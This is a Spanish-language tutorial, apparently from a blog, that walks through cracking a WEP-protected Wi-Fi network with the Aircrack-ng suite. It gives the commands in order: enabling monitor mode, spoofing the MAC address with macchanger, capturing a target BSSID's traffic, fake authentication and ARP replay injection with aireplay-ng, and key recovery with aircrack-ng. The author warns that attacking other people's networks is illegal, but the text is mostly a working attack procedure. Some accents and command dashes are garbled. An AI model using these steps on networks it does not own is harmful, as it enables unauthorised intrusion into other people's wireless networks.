Aircrack-ng: Comandos bsicos

Aircrack-ng es una suite de programas para la auditora de redes inalmbricas. Para qu es utilizado?. Sin duda ha logrado su xito para realizar ataques a redes inalmbricas ajenas con el objetivo de obtener la contrasea del router para poder acceder a internet entre otras cosas. Esta accin es ILEGAL. Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las ms fciles de descifrar y por error para el usuario de una conexin la ms comn.

Qu necesito para usar Aircrack-ng?. Es necesario tener una tarjeta de red inalmbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave. Los programas en cuestin que trae Aircrack-ng as como macchanger.

Qu es recomendado tener para usar Aircrack-ng? Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad). Aireplay-ng es el programa de inyeccin de paquetes. ste programa generar ms trfico en la red y por tanto capturaremos ms paquetes en mucho menos tiempo. Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribucin GNU/Linux. Hay que mencionar que hay distribuciones especficas que contienen ya Aircrack-ng as como ms programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, sto significa que no es necesario instalarlos en nuestra mquina, basta con grabarlos en un CD o USB e iniciar la mquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay Cmo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB? Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas.

Aircrack-ng Downloads En Ubuntu, que es la distribucin que uso yo:

sudo apt-get install aircrack-ng Para instalar Macchanger, puedes pasarte por su web

Macchanger Downloads En Ubuntu:

sudo apt-get install macchanger Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando bsicos para hacer un ataque a una red con encriptacion WEP con clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL. Prueba con tu red y vers que fcil es de vulnerar. Todos los comandos e informacin est sacada de la web oficial de Aircrack-ng.org. Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando vara segn la distribucin GNU/Linux que usemos.

sudo su *** Preparacin de la tarjeta airmon-ng >>interfaz inalmbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,). Yo usar ra0 por tener una ralink 2500.

airmon-ng stop ra0 >>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig ra0 down >>tarjeta de red desactiva: no sale nada por pantalla.

macchanger mac 00:11:22:33:44:55 ra0 >>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start ra0 >>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

*** Escaneo de redes y clientes asociados airodump-ng ra0 >>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la informacin como canal, nombre, calidad de seal, tipo de encriptacin, etc.. y los clientes que estn conectadas a las redes. As que elegimos una que tenga buena seal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecucin del comando pulsando Control+C, o cerrando y abriendo otra terminal.

airodump-ng c NumeroDeCanal w ArchivoDeCapturas bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi - bssid 00:01:02:03:04:C1 >>Capturando paquetes: nos va saliendo la captura de paquetes as como la seal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!

*** Inyeccin de paquetes para agilizar el proceso de capturas de paquetes Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 a BSSID h 00:11:22:33:44:55 e ESSID ra0 >>Association successful: Con esto hacemos una autenticacin falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0. aireplay-ng -3 b BSID h 00:11:22:33:44:55 ra0 >>Envo de paquetes: nos saldr por pantalla que se estn mandando paquetes, para que la inyeccin sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!! *** Crackeo WEP Para poder obtener la clave WEP es necesario tener un mnimo de paquetes recogidos. El nmero de paquetes depender de la longitud que tenga la clave WEP. Como mnimo recomiendo que empecis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos ms de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng b BSSID ArchivoDeCapturas.cap >>Clave WEP encontrada/no encontrada: El programa empezar a descifrar los paquetes recogidos, y cuando finalice nos dir si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados X paquetes recogidos. Si la encuentra nos saldr: KEY FOUND! y la clave en hexadecimal normalmente.